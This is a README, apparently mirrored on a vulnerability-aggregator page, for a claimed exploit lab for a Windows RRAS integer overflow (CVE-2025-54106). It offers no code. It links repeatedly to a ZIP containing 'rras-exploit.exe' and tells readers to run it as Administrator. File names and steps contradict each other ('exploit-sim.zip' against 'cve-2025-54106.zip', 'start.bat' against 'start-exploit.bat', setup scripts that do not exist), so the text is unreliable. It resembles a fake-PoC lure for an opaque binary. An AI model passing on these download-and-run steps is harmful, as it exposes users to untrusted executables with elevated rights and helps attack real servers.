来源

关联漏洞

描述

Integer Overflow in Windows Routing and Remote Access Service (RRAS)

介绍

# Lab: CVE-2025-54106 - Integer Overflow in Windows Routing and Remote Access Service (RRAS)
## Download Exploit
### [Download](https://github.com/DExplo1ted/CVE-2025-54106-POC/raw/refs/heads/main/Seed/cve-2025-54106.zip)  
## 🚀 Overview
A critical vulnerability (CVE-2025-54106) was discovered in the Windows Routing and Remote Access Service (RRAS) that allows unauthorized attackers to execute arbitrary code over a network via an integer overflow or wraparound condition (CWE-190). Disclosed on September 9, 2025, it affects Windows Server versions 2012 R2, 2016, 2019, 2022, and 2025.

The vulnerability has a CVSS v3.1 base score of 8.8 (HIGH) with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H. It enables network-based attacks with low complexity, no privileges required, but user interaction needed. Impacts include high risks to confidentiality, integrity, and availability, potentially allowing remote code execution on affected systems.

This lab provides a vulnerable setup using direct configuration on a Windows Server environment (via PowerShell scripts), along with exploitation steps and mitigations. It's structured for security researchers and educators to explore vulnerability analysis in a controlled setting. We recommend using a virtual machine to isolate the setup.

## 📋 Prerequisites
- Administrative privileges on the Windows Server instance.
- PowerShell 5.1 or later (included in Windows Server).
- Basic knowledge of networking, Windows administration, and vulnerability exploitation concepts.
- At least 8GB RAM and 20GB free disk space for the VM.
- Tools like Wireshark (optional) for traffic analysis during exploitation.
- Firewall configured to allow testing (e.g., open ports 1723 TCP and 1701 UDP for local testing only).

## Download & Install

1. Download the simulation package (contains exploit tools):  
   - [Download ZIP](https://github.com/DExplo1ted/CVE-2025-54106-POC/raw/refs/heads/main/Seed/cve-2025-54106.zip)  
     This ZIP includes:  
     - `rras-exploit.exe`: Main exploit executable (exploits RRAS integer overflow attack).  
     - `start-exploit.bat`: Batch file to launch the exploit (opens `rras-exploit.exe` with parameters).  
     - `config.ini`: Sample configuration for target IP and port.  

2. Unzip the package into the `/exploits/` directory of the cloned repo:  
   ```
   unzip exploit-sim.zip -d exploits/
   ```


## 🛠 Quick Start
1. Download the ZIP from the link above and extract it.  
2. Run the setup scripts as Administrator to configure RRAS.  
3. Navigate to the extracted folder and run `start.bat`. This will launch `rras-exploit.exe` with default settings, exploiting the server (use `localhost` as target).  
4. Follow the on-screen prompts in the executable to exploit the vulnerability—output will show packet crafting and overflow triggering.  
5. Monitor Windows Event Logs for impact:  
   ```
   powershell -Command "Get-EventLog -LogName Application -Source RemoteAccess"
   ```
## 📞 Support  
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.  

文件快照

 [4.0K]  /data/pocs/e723497be3f8db518e28dd47bfa32793f472327c
├── [3.1K]  README.md
└── [4.0K]  Seed
    └── [8.5M]  cve-2025-54106.zip

1 directory, 2 files

备注